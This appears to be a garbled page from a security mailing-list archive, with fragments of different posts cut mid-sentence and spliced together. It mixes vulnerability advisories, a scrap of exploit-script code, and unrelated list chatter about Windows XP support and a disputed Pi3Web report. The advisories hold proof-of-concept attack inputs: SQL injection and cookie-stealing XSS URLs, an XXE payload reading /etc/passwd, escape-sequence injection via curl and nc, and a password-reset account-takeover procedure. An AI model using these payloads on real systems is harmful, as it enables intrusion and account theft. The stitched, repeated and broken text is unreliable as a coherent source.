Next Page >>
getting
I - IP SPOOFING
The file "scripts/sb_communicate.php" contains the following
code:
19| function getIP() {
20| if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
21| $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
22| }
23| else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
24| $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
user's inputs are handled. All superglobal arrays which
can be partially modified by the user, are passed to the
function "parse_clean_globals()". Let's see the content
of the file "sources/ipsclass.php":
4847| $this->clean_globals( $_GET );
4848| $this->clean_globals( $_POST );
4849| $this->clean_globals( $_COOKIE );
4850| $this->clean_globals( $_REQUEST );
This function will replace special characters such as
-- Vulnerability description:
The default Twitter client (or application) in HTC mobile devices is called HTC Peep. HTC Peep is vulnerable to two different credentials disclosure vulnerabilities during the authentication process against the Twitter service (twitter.com).
During the authentication process, the HTC Peep app establishes an HTTP (TCP/80) connection against the twitter.com servers, sending a few HTTP OAuth-related requests. The first two HTTP GET requests try to gather and make use of an OAuth token: "GET /oauth/request_token" (the response contains the "oauth_token") and "GET /oauth/authorize?oauth_token=...".
The first vulnerability resides in the third HTTP request, a POST request towards the "/oauth/authorize" resource, which contains several parameters, including the Twitter username and password in the clear, making the authentication process vulnerable to eavesdropping attacks:
authenticity_token=c8b5abaf53f223e827d9258ddfef4285a816db5f&
oauth_token=I4FK956n1foaHjayLKXJT2IaBpsmoo0amKyPhebc&
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
some time ago, which have all been fixed for some time (since 2.10.12.06)
but not yet made public. Now that servers have had enough time to upgrade,
I feel it's time to do so.
None of these bugs can be abused for arbitrary code execution. Two are about
crashing a server, one about exposing IP addresses, and the effect of the
others stay within IRC: they allow clients to get more privileges on the IRC
network then they are supposed to have.
Overview
========
Affecting only 2.10.12.01:
function main()
{
$this->mhead();
# Gimme your args
$this->p_attack = $this->get_p('attack', true);
$this->p_prox = $this->get_p('proxhost');
$this->p_proxa = $this->get_p('proxauth');
$this->init_global();
Diskeeper is of minimal consequence, this write-up will focus on
the memory reading aspect.
By making use of shared user memory at 0x7FFE0000, an attacker can
learn information, such as Windows drive, path, and version. More
importantly for a targeted attack, an attacker can also get the
name, path, version and base address of all loaded modules in the
process. This would essentially defeat address space randomization
(ASLR) in Windows Vista, since loaded modules tend to have the same
preferred address in all processes for each boot of the system.
SQL query:
SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
B) "Varnish" log escape sequence injection
One of the following two Proofs Of Concept can be used in order to
7) Known vulnerabilities:
CVE ID Disclosed Title
CVE-2000-1038 12/11/2000 The web administration interface for IBM AS/400
Firewall allows remote attackers to cause a denial of service via an
empty GET request.
CVE-2002-1731 12/31/2002 The System Request menu in IBM AS/400 allows
local users to list valid user accounts by viewing the object names that
are type USRPRF.
CVE-2005-0868 05/02/2005 AS/400 Telnet 5250 terminal emulation clients,
as implemented by (1) IBM client access, (2) Bosanova, (3) PowerTerm,
Exploit (1)
Log into bytehoard using a non privileged user.
Perform any desired actions, then log out.
Click on the "Lost Details" link.
Input the desired username you want to have access to ("admin" to get
administrator access) and submit the data.
The system will either return an error message or a "mail sent" message.
Ignore the last message and go directly to the index.php page (easily
obtained by erasing the "?page=passreset" part)
You should have access to the desired account.
Details
*******
Using the discovered vulnerabilities, an attacker can intercept the cookie and perform any administrative actions in the system on its behalf.
1. cross-site scripting vulnerability found in script aa-add-analytic2.jsp
Vulnerable GET parameter "backURL"
2 cross-site scripting vulnerability found in script aa-add-validate.jsp
Vulnerable GET parameter "pagePos"
3 cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp
Vulnerable GET parameter "entry"
4 cross-site scripting vulnerability found in script aa-cacheparams.jsp
>>> new
>>> here... :/ As Larry and Thor pointed out, what sux is that despite M$
>>> "PROMISING" that they would continue supporting XP since they didn't
>>> exactly
>>> state WHAT they would support, they seem to be legally free to
>>> actually get
>>> away with this BS *sigh* gotta love insurance-salesman-tactics when
>>> it comes
>>> to promises...
>>>
>>> So... with all this commentary, in the end, I still didn't read from
b) M$ is trying to boost Win7 sales... Whoopdee-@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
"PROMISING" that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...
So... with all this commentary, in the end, I still didn't read from the
"big'uns" on whether or not a 3rd party open-source patch would be
line | file: admin/sources/base/ipsRegistry.php
352 | static public function init()
353 | {
... |
... |
462 | IPSLib::cleanGlobals( $_GET );
463 | IPSLib::cleanGlobals( $_POST );
464 | IPSLib::cleanGlobals( $_COOKIE );
465 | IPSLib::cleanGlobals( $_REQUEST );
466 |
467 | # GET first
>
> b) M$ is trying to boost Win7 sales... Whoopdee-@#$%#^-doo... As was stated
> earlier, they did the exact same thing back in Win2K days... Nothing new
> here... :/ As Larry and Thor pointed out, what sux is that despite M$
> "PROMISING" that they would continue supporting XP since they didn't exactly
> state WHAT they would support, they seem to be legally free to actually get
> away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
> to promises...
>
> So... with all this commentary, in the end, I still didn't read from the
> "big'uns" on whether or not a 3rd party open-source patch would be
>
> b) M$ is trying to boost Win7 sales... Whoopdee-@#$%#^-doo... As was stated
> earlier, they did the exact same thing back in Win2K days... Nothing new
> here... :/ As Larry and Thor pointed out, what sux is that despite M$
> "PROMISING" that they would continue supporting XP since they didn't exactly
> state WHAT they would support, they seem to be legally free to actually get
> away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
> to promises...
>
> So... with all this commentary, in the end, I still didn't read from the
> "big'uns" on whether or not a 3rd party open-source patch would be
----------------------------------------------------------------------
Top 5-ish Threats to Watch for in 2009
1. This continuing trend to invest in the constant reminders of
assumed security best practices screamed at all levels and types of
workers across the work site will continue to eat away budgets,
prevent security professionals from actually enhancing security and
distract employees from working. This includes policy tidbits and
factoids for employees to see everywhere from posters in the bathroom
to mouse pad messages on their desks to screensaver quizzes they need
to answer prior to login. Even organizations that eschew formal
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
Larry Seltzer
Contributing Editor, PC Magazine
larry_seltzer@ziffdavis.com
http://blogs.pcmag.com/securitywatch/
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
w = TRUE;
}
/* if readable or writeable */
if ( r == TRUE || w == TRUE )
{
/* get contents into our buffer */
memcpy ( buffer , base , 0x1000 );
/* print page attributes */
printf ( "attributes: " );
printf ( "%s" , ( r == TRUE ) ? "R":"" );
Please remove this wrong report (no crash happens as reported and Pi3Web version 2.013 doesn't exist at all!!!) and inform all sites copying information from your site about the removal.
I am very disapointed about the fact, that such reports are published without contacting software vendors or any attempt of verification/reproduction of reported issues.
Unfortunately the published reports are copied by the whole "internet security community" within days (google for "Pi3Web ISAPI DoS vulnerability"). But a correction of an once reported issue is never copied. As representant of a small open source project without budget I can only contact a handful of security sites in order to comment a wrong report.
But I can never repair the image demolition resulting from such false reports.
Therefore I will close the open source project Pi3Web for that reason, because wrong reports happened multiple times in the past.
Sunday, September 21, 2008
By Nelson Brito <nbrito@sekure.org>
-[ Introduction
It is just a matter of time to get things worse on the Internet. We saw
worms getting more and more sophisticated in last decade, and, believe me,
it could be worst. Nowadays we have botnets and a lot of worms and the
respective variants, but what if a stealth worm reaches the Internet today?
Are we prepared to deal with this kind of threat? Are we walk to the right
direction to get this kind of threat controlled in a short period of time?
or default urls:<br>
"powered by Open Classifieds" inurl:"item-new.php" (16,500 results)<br>
Total sites: ~100,000<br>
<br>
<br>
The target must be a link to the document root of OpenClassifieds<br>
(If the exploit doesn't immediately reload then blind sqli is required, which will take a few minutes ;)<br>
<form>
Target: <input size=128 name=target value="http://localhost/"><br>
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
<input type=submit value="Attack">
By requesting the demo "Dump Servlet" at an URL like "/test/dump/"
it's possible to obtain a number of details about the remote Jetty
instance.
Variables: getMethod, getContentLength, getContentType, getRequestURI,
getRequestURL, getContextPath, getServletPath, getPathInfo,
getPathTranslated, getQueryString, getProtocol, getScheme,
getServerName, getServerPort, getLocalName, getLocalAddr,
getLocalPort, getRemoteUser, getRemoteAddr, getRemoteHost,
getRemotePort, getRequestedSessionId, isSecure(), isUserInRole(admin),
bulletin)
Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
>
> 1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
>
> 2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
>
> t
>
Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
t
> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hello Bug Traq Readers, here are some updates on upcoming Black Hat
briefings as well as ways to get involved.
BLACK HAT FREE WEBINAR Nov 20th
https://www.blackhat.com/html/webinars/clickjacking.html
Black Hat Webcast #5 is scheduled for Thursday, November 20 at 1pm PST.
Still wrong, No DoS. The server responds to further requests, after the dialog box appears:
192.168.1.5
hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866
Next Page>>
|
